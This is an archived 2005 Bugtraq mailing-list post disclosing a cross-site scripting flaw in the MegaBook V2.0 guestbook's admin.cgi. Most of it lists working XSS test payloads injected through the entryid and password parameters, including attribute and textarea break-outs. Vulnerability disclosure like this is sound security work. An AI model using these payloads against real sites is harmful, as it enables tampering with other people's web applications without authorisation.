[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MegaBook V2.0 - Cross Site Scripting Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat <spyhat@xxxxxxxxxx>
Date: 5 May 2005 10:45:51 -0000


The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross 
Site Scripting, which will allow the attacker to modify the post in the 
guestbook. The affected scripts is admin.cgi 

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 

I have tested the script with the following query:

?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;

I have also tested the script with theses POST variables:

action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;

action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;

action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;

action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;

action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;


Yours,
SpyHat

Prev by Date: MRO Maximo v4 & v5
Next by Date: Oracle 9i / 10g Fine Grained Auditing Issue
Previous by thread: MRO Maximo v4 & v5
Next by thread: Re: MegaBook V2.0 - Cross Site Scripting Exploit
Index(es):
- Date
- Thread